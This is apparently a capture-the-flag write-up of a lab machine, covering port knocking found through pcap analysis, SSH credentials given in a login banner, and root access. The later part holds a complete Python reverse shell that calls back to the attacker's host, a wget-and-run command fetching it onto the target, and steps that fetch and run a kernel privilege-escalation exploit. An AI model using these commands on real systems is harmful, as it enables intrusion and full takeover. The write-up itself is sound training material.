Introduction

This machine, according to its documentation, is meant to improve knowledge about port knocking, pcap analysis and basic Linux exploitation.

Port Knocking

Port knocking is a technique used to open ports on a firewall by generating connection attempts to a single port or to a specific sequence of ports. When the correct port or sequence is probed, the firewall opens the actual port for the host that attempted the connections. The knock packets themselves are never accepted: the daemon watching the firewall (by sniffing the interface or reading the firewall log) only needs to see the SYNs arrive, which is why a knock port still answers with "connection refused" or nothing at all.
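The knock.py used later in this write-up is not shown on the page, so here is an added example of my own (not the author's tool) of what such a client does: one TCP connect attempt per port, in the order given, with a short pause so the SYNs are not reordered. The host, ports and timeout values are whatever you pass on the command line; nothing here is taken from the box.

```python
"""Minimal port-knock client. Usage: python3 knock.py HOST PORT [PORT ...]"""
import socket
import sys
import time


def knock_once(host, port, timeout=0.5):
    """Send one TCP connection attempt (i.e. one SYN) to host:port and report how it ended.

    'refused' (RST came back) and 'timeout' (silently dropped) are both normal for a knock
    port, because the knock daemon only has to observe the SYN. 'open' means a real service
    accepted the connection, which usually means you are not knocking on a knock port at all.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "refused"
    except socket.timeout:
        return "timeout"
    except OSError:
        return "error"  # e.g. network unreachable
    finally:
        s.close()


def knock(host, ports, timeout=0.5, delay=0.2):
    """Knock on each port in order and return [(port, outcome), ...].

    Knock daemons match on order, so a short pause between attempts keeps the SYNs
    from arriving out of sequence.
    """
    results = []
    for port in ports:
        results.append((port, knock_once(host, port, timeout)))
        time.sleep(delay)
    return results


def parse_ports(args):
    """Parse '1 3 3 7' style arguments; repeats are allowed because a sequence may reuse a port."""
    ports = [int(a) for a in args]
    bad = [p for p in ports if not 1 <= p <= 65535]
    if bad:
        raise ValueError("invalid port(s): %s" % bad)
    return ports


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit("usage: %s HOST PORT [PORT ...]" % sys.argv[0])
    for port, outcome in knock(sys.argv[1], parse_ports(sys.argv[2:])):
        print("%5d  %s" % (port, outcome))
```

Run it exactly as the write-up does (`python3 knock.py 10.0.0.78 7000 8000 9000`) and then rescan with nmap; every knock port reporting "refused" is expected, not a failure.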

Enumerating

The first thing to do, as always, is enumerate the machine.

# nmap -sV -sS  10.0.0.78
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 18:27 EET
Nmap scan report for 10.0.0.78
Host is up (0.057s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Apache is running on port 80. Curling it we get:

# curl 10.0.0.78
<html>
<h1>huhuhuh Hey Beavis... huhuhh  Check it out!</h1>
<br>
<a href="pcap1.pcap">Wooah</a>
</html>

This is the first pcap file, so let’s download it.

wget 10.0.0.78/pcap1.pcap

I then used Wireshark to analyze it.

[Screenshot: pcap file opened with Wireshark]

Since the machine is about port knocking, let's focus primarily on TCP connections. Twice we can see the same group of three TCP SYN packets, to ports 7000, 8000 and 9000 in that order. This is probably the sequence that opens some other port.
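Clicking through Wireshark works for a capture this small, but the same reasoning can be automated. The following is an added example (my code, not part of the original write-up) that reads a classic little-endian pcap with Ethernet framing, picks out every bare SYN, looks at how the other side answered it, and groups a client's run of unanswered or RST-ed SYNs with the next port that completed a handshake. The capture it runs on is constructed inline (addresses, ports and timing are made up to mirror what pcap1.pcap shows) and is not the real pcap1.pcap.

```python
"""Find port-knock sequences in a pcap: runs of bare SYNs that get RST (or nothing) back,
followed by a SYN to a port that answers SYN-ACK, i.e. the port the knock unlocked."""
import struct
from collections import defaultdict

SYN, RST, ACK = 0x02, 0x04, 0x10  # TCP flag bits we care about


def parse_pcap(data):
    """Yield (ts, src_ip, dst_ip, sport, dport, flags) for each TCP/IPv4/Ethernet packet
    in a classic little-endian pcap. pcapng or other link types are not handled here."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic != 0xA1B2C3D4:
        raise ValueError("unsupported pcap magic %#x" % magic)
    off = 24  # skip the global header
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _ = struct.unpack_from("<IIII", data, off)
        off += 16
        frame = data[off:off + incl_len]
        off += incl_len
        if frame[12:14] != b"\x08\x00":  # EtherType must be IPv4
            continue
        ip = frame[14:]
        if ip[9] != 6:  # protocol must be TCP
            continue
        ihl = (ip[0] & 0x0F) * 4
        src = ".".join(str(b) for b in ip[12:16])
        dst = ".".join(str(b) for b in ip[16:20])
        tcp = ip[ihl:]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        yield (ts_sec + ts_usec / 1e6, src, dst, sport, dport, tcp[13])


def classify_syns(packets):
    """For every bare SYN (SYN set, ACK clear) find the reply on the reversed 4-tuple:
    'syn-ack' means the port was open, 'rst' closed, 'none' dropped by a firewall."""
    packets = list(packets)
    out = []
    for i, (ts, src, dst, sport, dport, flags) in enumerate(packets):
        if flags & (SYN | ACK) != SYN:
            continue
        answer = "none"
        for _, s2, d2, sp2, dp2, f2 in packets[i + 1:]:
            if (s2, d2, sp2, dp2) == (dst, src, dport, sport):
                if (f2 & (SYN | ACK)) == (SYN | ACK):
                    answer = "syn-ack"
                elif f2 & RST:
                    answer = "rst"
                break
        out.append((ts, src, dport, answer))
    return out


def knock_sequences(syn_results, window=5.0):
    """Group a client's consecutive SYNs to closed/dropped ports (each within `window`
    seconds of the previous one) and pair them with the next port that answered SYN-ACK.
    Returns [(knock_ports, opened_port), ...]."""
    found = []
    pending = defaultdict(list)  # src_ip -> [(ts, port), ...]
    for ts, src, dport, answer in syn_results:
        if answer != "syn-ack":
            if pending[src] and ts - pending[src][-1][0] > window:
                pending[src] = []  # too slow; a knock daemon would have reset the sequence
            pending[src].append((ts, dport))
        elif pending[src]:
            found.append(([p for _, p in pending[src]], dport))
            pending[src] = []
    return found


def _frame(ts, src, dst, sport, dport, flags):
    """Build one pcap record holding a minimal Ethernet/IPv4/TCP packet (checksums left zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    frame = b"\x00" * 12 + b"\x08\x00" + ip + tcp
    usec = int(round((ts % 1) * 1e6))
    return struct.pack("<IIII", int(ts), usec, len(frame), len(frame)) + frame


def sample_pcap():
    """Constructed capture (not pcap1.pcap): two rounds of knocks on 7000, 8000, 9000, each
    answered with RST, followed by a completed handshake to 8888. Addresses are made up."""
    client, server, t, recs = "192.168.56.102", "192.168.56.101", 1000.0, []
    for rnd in range(2):
        for i, port in enumerate((7000, 8000, 9000)):
            sport = 40000 + 10 * rnd + i
            recs.append(_frame(t, client, server, sport, port, SYN))
            recs.append(_frame(t + 0.01, server, client, port, sport, RST | ACK))
            t += 0.5
        sport = 40100 + rnd
        recs.append(_frame(t, client, server, sport, 8888, SYN))
        recs.append(_frame(t + 0.01, server, client, 8888, sport, SYN | ACK))
        recs.append(_frame(t + 0.02, client, server, sport, 8888, ACK))
        t += 30
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    return header + b"".join(recs)


if __name__ == "__main__":
    for knock, opened in knock_sequences(classify_syns(parse_pcap(sample_pcap()))):
        print("knock %s -> opens %d" % (knock, opened))
```

To run it over the real capture replace `sample_pcap()` with `open("pcap1.pcap", "rb").read()`; if that file turns out to be pcapng or carries a different link type, the reader above will refuse it rather than guess. Treating "none" the same as "rst" matters in practice: a firewall that DROPs instead of REJECTs leaves the knock SYNs unanswered, and they still belong to the sequence.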

To do the knocking, it is possible to use telnet (a refused connection is still a SYN, which is all the knock daemon needs to see) or a custom program such as the simple Python tool, knock.py, used further down.

# telnet 10.0.0.78 7000
Trying 10.0.0.78...
telnet: Unable to connect to remote host: Connection refused
# telnet 10.0.0.78 8000
Trying 10.0.0.78...
telnet: Unable to connect to remote host: Connection refused
# telnet 10.0.0.78 9000
Trying 10.0.0.78...
telnet: Unable to connect to remote host: Connection refused
# nmap -sV -sS  10.0.0.78 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 18:40 EET
Nmap scan report for 10.0.0.78
Host is up (0.063s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.7 ((Ubuntu))
8888/tcp open  tcpwrapped

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.17 seconds

Now we see that port 8888 is open. Looking back at the pcap, right after the second knock sequence there is indeed a TCP connection to port 8888, so the capture was showing us both the knock and the port it unlocks.

# telnet 10.0.0.78 8888
Trying 10.0.0.78...
Connected to 10.0.0.78.
Escape character is '^]'.
/burgerworld/
Connection closed by foreign host.

Connecting to this port we get what looks like a web path, so let's use curl again to explore it.

# curl 10.0.0.78/burgerworld/
<html>
<h1>heheheh..Hey Hows It Going..heheh..</h1>
<br>
<a href="pcap2.pcap">heheh...hehh..</a>
</html>

Another pcap file to download and analyze. This time there is no obvious run of TCP connection attempts that could be another knock sequence. Following the TCP streams, though, and in particular the last one in the capture, we find a "hidden" message.

[Screenshot: following the last TCP stream in Wireshark]

You do not need to speak German to understand that eins, drei and sieben are one, three and seven, so the message spells out the sequence 1 3 3 7. Let's knock on these ports and see what happens.

# python3 knock.py 10.0.0.78 1 3 3 7
# nmap -sV -sS  10.0.0.78 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 19:02 EET
Nmap scan report for 10.0.0.78
Host is up (0.060s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
1337/tcp open  waste?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.70%I=7%D=2/16%Time=5C684247%P=x86_64-pc-linux-gnu%r(NU
SF:LL,F,"/iamcornholio/\n")%r(GenericLines,F,"/iamcornholio/\n")%r(GetRequ
SF:est,F,"/iamcornholio/\n")%r(HTTPOptions,F,"/iamcornholio/\n")%r(RTSPReq
SF:uest,F,"/iamcornholio/\n")%r(RPCCheck,F,"/iamcornholio/\n")%r(DNSVersio
SF:nBindReqTCP,F,"/iamcornholio/\n")%r(DNSStatusRequestTCP,F,"/iamcornholi
SF:o/\n")%r(Help,F,"/iamcornholio/\n")%r(SSLSessionReq,F,"/iamcornholio/\n
SF:")%r(TLSSessionReq,F,"/iamcornholio/\n")%r(Kerberos,F,"/iamcornholio/\n
SF:")%r(SMBProgNeg,F,"/iamcornholio/\n")%r(X11Probe,F,"/iamcornholio/\n")%
SF:r(FourOhFourRequest,F,"/iamcornholio/\n")%r(LPDString,F,"/iamcornholio/
SF:\n")%r(LDAPSearchReq,F,"/iamcornholio/\n")%r(LDAPBindReq,F,"/iamcornhol
SF:io/\n")%r(SIPOptions,F,"/iamcornholio/\n")%r(LANDesk-RC,F,"/iamcornholi
SF:o/\n")%r(TerminalServer,F,"/iamcornholio/\n")%r(NCP,F,"/iamcornholio/\n
SF:")%r(NotesRPC,F,"/iamcornholio/\n")%r(JavaRMI,F,"/iamcornholio/\n")%r(W
SF:MSRequest,F,"/iamcornholio/\n")%r(oracle-tns,F,"/iamcornholio/\n")%r(ms
SF:-sql-s,F,"/iamcornholio/\n")%r(afp,F,"/iamcornholio/\n")%r(giop,F,"/iam
SF:cornholio/\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.46 seconds

After knocking on ports 1, 3, 3 and 7, port 1337 is open. Nmap's own service fingerprint is enough to see that it hands out another web path: /iamcornholio/.

# curl 10.0.0.78/iamcornholio/
<html>

<h1>huhhuhhh...Hey Beavis...Im all about uhhh...huhuh...that base huhhuhhh...</h1>

T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK

</html>

This clearly looks like a base64-encoded string, so let's decode it.

# echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" | base64 -d
Open up SSH: 8888 9999 7777 6666

It seems this will be the last knock, the one that opens SSH.

# python3 knock.py 10.0.0.78 8888 9999 7777 6666
# ssh 10.0.0.78
The authenticity of host '10.0.0.78 (10.0.0.78)' can't be established.
ECDSA key fingerprint is SHA256:uSdkKIWXcJl0j0P5Y+cAzjD9CJOFQ/NxtG8kz8ptzFE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.0.78' (ECDSA) to the list of known hosts.
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
root@10.0.0.78's password: 

That first attempt tried to log in as root because no username was given (ssh defaults to the local user, and we are root on Kali), but the SSH banner hands us credentials, so let's log in with those.

# ssh butthead@10.0.0.78
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
butthead@10.0.0.78's password: 
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:  https://help.ubuntu.com/
Last login: Tue Mar  3 01:02:49 2015 from 192.168.56.102
You are only logging in for a split second! What do you do!
Connection to 10.0.0.78 closed.

The connection closes right away, so we have no time to run anything interactively. We can still pass a command on the ssh command line and run commands one by one: a command given this way runs non-interactively, which evidently sidesteps whatever terminates the interactive login.

# ssh butthead@10.0.0.78 pwd
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
butthead@10.0.0.78's password: 
/home/butthead
# ssh butthead@10.0.0.78 ls -l /home/butthead/
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
butthead@10.0.0.78's password: 
total 4
-rw-rw-r-- 1 butthead butthead 67 Mar  3  2015 nachos
# ssh butthead@10.0.0.78 cat nachos
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
butthead@10.0.0.78's password: 
Great job on getting this far.

Can you login as beavis or root ?

So there is a file, 'nachos', in butthead's home directory that challenges us to log in as beavis or root. At this point it is more convenient to get a proper shell. To do that, let's host on our Kali VM a file called shell.py, a simple reverse shell in Python with hardcoded connection parameters:

import socket, subprocess, os

# Connect back to the netcat listener on the Kali VM (address and port are hardcoded).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.8.0.108", 4444))
# Point stdin, stdout and stderr of this process at the socket...
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# ...so the interactive shell spawned here reads from and writes to the connection.
subprocess.call(["/bin/sh", "-i"])

In this case 10.8.0.108 is the address of my Kali VM. On that VM, let's use netcat to listen for the incoming connection.

nc -lvp 4444

Let's now fetch the file on the target machine (shell.py must be served over HTTP from the Kali VM, for example with python3 -m http.server 80 in the directory holding it) and execute it:

ssh butthead@10.0.0.78 'wget 10.8.0.108/shell.py && python shell.py'

The quotes matter: without them the local shell splits the line at &&, so wget runs on the target but python shell.py runs on Kali.

At this point a simple shell is spawned and we can run commands more conveniently from the Kali VM. uname -a confirms what the SSH login banner already showed: the target runs Linux 3.13 on Ubuntu 14.04 (i686). A quick search on ExploitDB points us to a local privilege escalation exploit for this kernel.

Let's put the exploit's C code in a file (osf.c) that we again serve from the Kali machine. Then we download it on the target, compile it and run it. This needs gcc on the target; if it is missing, compile on a matching Ubuntu 14.04 i686 system and upload the binary instead.

wget 10.8.0.108/osf.c
gcc osf.c -o osf
./osf
[...]
# whoami
root

We got root. To conclude the machine we check /root as usual, where we finally find:

# ls -la /root
total 28
drwx------  3 root root 4096 Mar  3  2015 .
drwxr-xr-x 21 root root 4096 Mar  2  2015 ..
drwx------  2 root root 4096 Mar  2  2015 .aptitude
-rw-------  1 root root  370 Mar  3  2015 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-r--r--  1 root root  202 Mar  3  2015 SECRETZ
# ls -la /root/SECRETZ
-rw-r--r-- 1 root root 202 Mar  3  2015 /root/SECRETZ
# cat /root/SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!

SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"

admin@top-hat-sec.com

Now we can consider this machine pwned.


For any correction, feedback or question feel free to drop a mail to security[at]coolbyte[dot]eu.